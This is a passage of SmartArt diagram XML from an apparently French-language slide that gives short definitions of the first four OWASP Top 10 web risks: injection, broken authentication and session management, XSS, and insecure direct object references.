          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4AA9460D-8CBD-4DAC-B193-6D80211E49ED}" type="pres">
      <dgm:prSet presAssocID="{CF4A2635-5775-44A7-B659-F5DBA01CCF0A}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3C7B2DDB-3FF6-42A3-9386-7A253E98FD62}" type="pres">
      <dgm:prSet presAssocID="{C40210B5-480D-4766-978A-36F3F23CB9B8}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{00DAAF4C-114B-41A9-AAA5-51A8EB19C769}" type="pres">
      <dgm:prSet presAssocID="{C40210B5-480D-4766-978A-36F3F23CB9B8}" presName="parentText" presStyleLbl="node1" presStyleIdx="4" presStyleCnt="5" custScaleX="30023">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BCBAC2F4-E546-4A38-8714-1F12CC525401}" type="pres">
      <dgm:prSet presAssocID="{C40210B5-480D-4766-978A-36F3F23CB9B8}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="4" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{26ABB8A4-2126-4601-8276-CB099BFB0770}" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{0945CDD4-9E6A-4629-B151-EFF4819549CB}" srcOrd="1" destOrd="0" parTransId="{4A0BC050-CE9B-4496-A285-A9644C15A612}" sibTransId="{DB92B70E-00E3-4B8F-87A9-124474721CDF}"/>
    <dgm:cxn modelId="{8D4B0720-5DA1-4085-AC8D-5C4A00809855}" type="presOf" srcId="{7816F859-9BB8-418F-993B-33CDEC6D01E8}" destId="{BCBAC2F4-E546-4A38-8714-1F12CC525401}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{B9612948-54D2-41E9-A93F-C1435672D7A4}" type="presOf" srcId="{29D76988-94EC-456A-9326-82A5AA778D9E}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{7DEE1A53-65DD-4E9D-93FE-984B38E27D84}" type="presOf" srcId="{9E1EBBD0-E4A0-4B33-A4CB-F66E80AADE45}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{B4D0A942-B31E-484E-BF58-C9B3ED185E9E}" srcId="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}" destId="{7DAE1B00-ED9C-430F-B339-41CFF77CEF7B}" srcOrd="0" destOrd="0" parTransId="{42905EBD-BA0A-4D34-9CED-A12597E21E2C}" sibTransId="{55366D54-64C0-4D0E-9E4C-F6822D37BB09}"/>
    <dgm:cxn modelId="{7CB7CBE1-DF06-45CD-9EEF-067629A90534}" type="presOf" srcId="{1FE8A14D-88E8-4809-80E0-7B4946E452E5}" destId="{1BBF15A1-D05A-4DF7-B79B-CA1460F5C0E4}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{EE7C3563-5BCB-4084-AEEF-A11525BDB86F}" type="presOf" srcId="{F576BD5F-AD4E-429F-935A-1A67C630AE0F}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{7FDC6EB3-4D5B-4EE2-844B-05A2D6F5E536}" type="presOf" srcId="{0945CDD4-9E6A-4629-B151-EFF4819549CB}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="0" destOrd="1"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B22AE750-3E44-4FB4-9DA3-DA74B14CB450}" type="presOf" srcId="{BCC482EA-6C38-44EB-ABEC-842881B2C10F}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{8EEFB8BF-BBB8-4BE9-9B47-927ECB68BAC1}" type="presOf" srcId="{024BBBE2-0706-4354-8AB0-3262009E8862}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="0" destOrd="2"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EC7183F3-3AD8-4BD6-BA27-CF3A93E83F95}" type="presOf" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{372554D2-034D-44C8-B1EA-4306B7E6230B}" type="presOf" srcId="{C40210B5-480D-4766-978A-36F3F23CB9B8}" destId="{00DAAF4C-114B-41A9-AAA5-51A8EB19C769}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{80EDFD26-16A6-41C2-86A2-A8A31B2A2E76}" type="presOf" srcId="{D8BC7F1A-0E3C-445E-9575-4512324EDAC9}" destId="{BCBAC2F4-E546-4A38-8714-1F12CC525401}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{AE4F3A7F-7D90-423A-8FE2-582943274445}" srcId="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}" destId="{1FE8A14D-88E8-4809-80E0-7B4946E452E5}" srcOrd="1" destOrd="0" parTransId="{4A22B486-9496-4AAD-B682-1802E2A01EDC}" sibTransId="{683143C8-F466-4015-B806-0195AE0F2382}"/>
    <dgm:cxn modelId="{552BEC9E-B5F4-450A-887F-2537B364E7E3}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" srcOrd="0" destOrd="0" parTransId="{A201932A-BA50-4861-8522-7F31487BAA62}" sibTransId="{5934DCE2-D67E-4FF3-9717-AC23829A1B63}"/>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0B67B498-F3AE-46E5-BF54-4DC4543B91EA}" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{BCC482EA-6C38-44EB-ABEC-842881B2C10F}" srcOrd="0" destOrd="0" parTransId="{F5C6F9E8-15EA-4DB6-A217-AAF35BF62BA9}" sibTransId="{B795B6C3-2D36-4EF0-A50C-AE561665029F}"/>
    <dgm:cxn modelId="{22EB1E2F-2E9C-4D51-943B-6C60E251EEB6}" type="presOf" srcId="{FE1D3C8A-BAB1-4DF8-A33A-DAA9700726E1}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}"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FB889DBF-B1CE-4E49-9460-59F84B9B486C}" type="presOf" srcId="{7FF32AF6-DBCC-4EB2-B43B-A00188F7D204}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{4A9F2EFB-F0D1-4DED-ABFF-5BA1C8507EF4}" type="presOf" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{13D31E1D-AAA2-4FA3-B46E-809665F827F4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{8759A102-6DD6-447D-AC76-DA13C8FF9544}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" srcOrd="1" destOrd="0" parTransId="{69CA534A-D7C1-40A6-A52D-08C1C25C2AF2}" sibTransId="{D22B1E2D-9241-472F-8A9E-565E70887137}"/>
    <dgm:cxn modelId="{532B2766-C9B6-4855-8300-0EA1EC2F21E7}" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{71911432-F414-4A80-97A8-23501F7683A0}" srcOrd="1" destOrd="0" parTransId="{8A9FA216-0683-4A46-B1D2-037BC7F64BD6}" sibTransId="{311F234A-65E6-4DDB-B158-B9432A520F07}"/>
    <dgm:cxn modelId="{5E19BF9A-5458-4942-B191-9E810EAB01B4}" type="presOf" srcId="{71911432-F414-4A80-97A8-23501F7683A0}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="1"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04D8DB34-5F2B-4DA9-9A3B-A1F66F456C14}" type="presOf" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{32E4C202-A073-4E81-BC9F-5F3538C94998}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{460129C2-D5FA-4B36-A2D9-CA50D3D26274}" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{8D122DB6-6C0E-4D20-A72C-736DE21EC8D0}" srcOrd="2" destOrd="0" parTransId="{070C93F6-752D-4DBB-9D29-5B772454B72B}" sibTransId="{7732DA14-DAD9-46E0-81D8-10D0187DA04D}"/>
    <dgm:cxn modelId="{3BC735DC-4A99-4556-B846-CAE5A9B4A2E2}" type="presOf" srcId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" destId="{F564D79A-2552-48FA-AA2D-99B849FE28FB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{024060A5-7686-41AA-A2AE-000AD40C852B}" type="presOf" srcId="{7DAE1B00-ED9C-430F-B339-41CFF77CEF7B}" destId="{1BBF15A1-D05A-4DF7-B79B-CA1460F5C0E4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{A30BB18F-E0AE-47B5-ADC6-D7DCF9B5ABE6}" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{29D76988-94EC-456A-9326-82A5AA778D9E}" srcOrd="2" destOrd="0" parTransId="{6A4B80EA-0979-48A1-9532-E35ABAD830C6}" sibTransId="{41E4CEE4-E668-414D-904A-3A62818B4066}"/>
    <dgm:cxn modelId="{65E293C4-8446-4D76-8E67-433373C95C36}" type="presOf" srcId="{8D122DB6-6C0E-4D20-A72C-736DE21EC8D0}" destId="{29555282-7DBF-4954-82C2-561252AD070F}"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55D72AD2-0211-40BC-A0F3-C386D305CB1F}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" srcOrd="2" destOrd="0" parTransId="{3E44837D-D7DC-4906-821E-A6950790F46F}" sibTransId="{35F82638-1CE8-4F68-915D-3475E1D94C1A}"/>
    <dgm:cxn modelId="{6010088D-1046-466A-BB02-8A55CE262380}" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{9E1EBBD0-E4A0-4B33-A4CB-F66E80AADE45}" srcOrd="3" destOrd="0" parTransId="{53CD5622-4FF7-42BA-82CF-9FA917848989}" sibTransId="{6249606A-E44B-456D-8550-331FDC0465D3}"/>
    <dgm:cxn modelId="{659E11AF-A407-47CA-A6E0-4DC7495CD1D2}" type="presOf" srcId="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}" destId="{17989DDF-81A9-4A76-BCBA-5B2768E57B7F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{A3ACD812-E5D1-490F-8E98-5B15107A30CE}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{E49726BA-1773-46ED-9FF3-586BF4430A36}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{7412B3F9-F037-4604-BF24-24A44BC1C258}" type="presParOf" srcId="{E49726BA-1773-46ED-9FF3-586BF4430A36}" destId="{13D31E1D-AAA2-4FA3-B46E-809665F827F4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{366554BF-2E2E-4D93-8380-4518E2AC2FDD}" type="presParOf" srcId="{E49726BA-1773-46ED-9FF3-586BF4430A36}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{F5F52151-831C-4575-A71F-E1A850257B08}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{7AEB17ED-67DE-40AD-82AF-B765FE5DE4A4}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{D70ACA0B-2476-4DF3-A565-DA743F67DCD1}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{2192953A-8EDA-4AC0-AB92-A559610AD6D2}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{737A8F85-D13D-4B1F-8F04-158B1BFDD62E}" type="presParOf" srcId="{2192953A-8EDA-4AC0-AB92-A559610AD6D2}" destId="{32E4C202-A073-4E81-BC9F-5F3538C94998}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{4403C99B-13B4-46E5-BA0B-9DED8748D0A9}" type="presParOf" srcId="{2192953A-8EDA-4AC0-AB92-A559610AD6D2}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{2A97E642-EA07-4552-AE71-B72B3BC3CF9B}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{1EE8983F-39C0-49FF-AD53-824215AC9C92}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{41155ADE-19D8-402D-A4B0-54B938C1F4AF}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{D13B288C-5416-41CB-97B8-3FF086D123C6}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{7D122E4E-E96E-49D5-AA41-718B96DAFE7E}" type="presParOf" srcId="{D13B288C-5416-41CB-97B8-3FF086D123C6}" destId="{F564D79A-2552-48FA-AA2D-99B849FE28FB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{53000374-C3DD-4EDD-9D21-814D07B527CA}" type="presParOf" srcId="{D13B288C-5416-41CB-97B8-3FF086D123C6}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{CDA79312-C907-4F90-A07B-B6B835B71F51}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{A17B0090-2551-41E3-9B14-B0E324CDDD6A}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{3B7183C9-190B-4807-A313-F965A9F306CD}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{D8C292E2-10B3-4B4F-B80F-989C1AD6F2D8}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{1D516590-9853-446D-BE2E-1F1C5366CAFA}" type="presParOf" srcId="{D8C292E2-10B3-4B4F-B80F-989C1AD6F2D8}" destId="{17989DDF-81A9-4A76-BCBA-5B2768E57B7F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{92DFD383-F337-415F-BBBE-DBC98C72614B}" type="presParOf" srcId="{D8C292E2-10B3-4B4F-B80F-989C1AD6F2D8}" destId="{1BBF15A1-D05A-4DF7-B79B-CA1460F5C0E4}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{A70970B6-ADB1-4560-A64F-F6B8CEEC98F8}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{4AA9460D-8CBD-4DAC-B193-6D80211E49ED}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{B97A169B-C083-44BD-B39D-A45B9431417C}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{3C7B2DDB-3FF6-42A3-9386-7A253E98FD62}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{41E23593-E6C0-486E-969A-2411AED524CD}" type="presParOf" srcId="{3C7B2DDB-3FF6-42A3-9386-7A253E98FD62}" destId="{00DAAF4C-114B-41A9-AAA5-51A8EB19C769}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{AF1D9E6A-35D7-4D79-84D2-D71F586F23BE}"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477428" y="-2222003"/>
          <a:ext cx="611795" cy="5218176"/>
        </a:xfrm>
        <a:prstGeom prst="round2SameRect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95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576" tIns="36576" rIns="36576" bIns="18288" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="just" defTabSz="444500">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" b="0" i="0" u="none" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Une faille d'injection, telle l'injection SQL, OS et LDAP, se produit quand une donnée non fiable est envoyée à un interpréteur en tant qu'élément d'une commande ou d'une requête. Les données hostiles de l'attaquant peuvent duper l'interpréteur afin de l'amener à exécuter des commandes fortuites ou accéder à des données non autorisées</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="0" i="0" u="none" kern="1200" dirty="0" smtClean="0"/>
            <a:t>.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2174238" y="111052"/>
        <a:ext cx="5188311" cy="552065"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{13D31E1D-AAA2-4FA3-B46E-809665F827F4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="760986" y="4712"/>
          <a:ext cx="1413251" cy="76474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A1 – Injection</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="798318" y="42044"/>
        <a:ext cx="1338587" cy="690080"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{52F1B1A3-C58C-409E-9189-6742201CA556}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4477428" y="-1419022"/>
          <a:ext cx="611795" cy="5218176"/>
        </a:xfrm>
        <a:prstGeom prst="round2SameRect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95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576" tIns="36576" rIns="36576" bIns="18288" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="just" defTabSz="444500">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" b="0" i="0" u="none" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Les fonctions applicatives relatives à l'authentification et la gestion de session ne sont souvent pas mises en œuvre correctement, permettant aux attaquants de compromettre les mots de passe, clés, jetons de session, ou d'exploiter d'autres failles d'implémentation pour s'approprier les identités d'autres utilisateurs.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2174238" y="914033"/>
        <a:ext cx="5188311" cy="552065"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{003658D4-D49D-4F10-A431-9B7DDB9AF5BC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="760986" y="807693"/>
          <a:ext cx="1413251" cy="76474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A2 – </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1200" b="1" i="0" u="none" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Violation de Gestion d'Authentification et de Session</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="798318" y="845025"/>
        <a:ext cx="1338587" cy="690080"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{7C8316E6-CCC6-432E-9248-FEE6B536ED74}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4477428" y="-616041"/>
          <a:ext cx="611795" cy="5218176"/>
        </a:xfrm>
        <a:prstGeom prst="round2SameRect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95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576" tIns="36576" rIns="36576" bIns="18288" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="just" defTabSz="444500">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" b="0" i="0" u="none" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Les failles XSS se produisent chaque fois qu'une application accepte des données non fiables et les envoie à un browser web sans validation appropriée. XSS permet à des attaquants d'exécuter du script dans le navigateur de la victime afin de détourner des sessions utilisateur, défigurer des sites web, ou rediriger l'utilisateur vers des sites malveillants</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="0" i="0" u="none" kern="1200" dirty="0" smtClean="0"/>
            <a:t>.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2174238" y="1717014"/>
        <a:ext cx="5188311" cy="552065"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A6F3CB7F-5F61-44E3-9C30-A5FD20B57740}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="760986" y="1610674"/>
          <a:ext cx="1413251" cy="76474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A3 – Cross-Site Scripting (XSS)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="798318" y="1648006"/>
        <a:ext cx="1338587" cy="690080"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{191C5091-28DD-4765-9653-28B6CE68C4E4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4477428" y="186940"/>
          <a:ext cx="611795" cy="5218176"/>
        </a:xfrm>
        <a:prstGeom prst="round2SameRect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95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576" tIns="36576" rIns="36576" bIns="18288" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="just" defTabSz="444500">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" b="0" i="0" u="none" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Une référence directe à un objet se produit quand un développeur expose une référence à un objet d'exécution interne, tel un fichier, un dossier, un enregistrement de base de données ou une clé de base de données. Sans un contrôle d'accès ou autre protection, les attaquants peuvent manipuler ces références pour accéder à des données non autorisées</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="0" i="0" u="none" kern="1200" dirty="0" smtClean="0"/>
            <a:t>.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2174238" y="2519996"/>
        <a:ext cx="5188311" cy="552065"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{7BBDFC2B-854A-4CD2-A909-AD613CC7FC62}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="760986" y="2413656"/>
          <a:ext cx="1413251" cy="76474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A4 – </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1200" b="1" i="0" u="none" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Références directes non sécurisées à un objet</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="798318" y="2450988"/>
        <a:ext cx="1338587" cy="690080"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{DC3A35B8-DD6D-4881-97A7-11F37E912D62}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4477428" y="989921"/>
          <a:ext cx="611795" cy="5218176"/>
        </a:xfrm>
        <a:prstGeom prst="round2SameRect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95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576" tIns="36576" rIns="36576" bIns="18288" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="just" defTabSz="444500">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" b="0" i="0" u="none" kern="1200" dirty="0" smtClean="0"/>
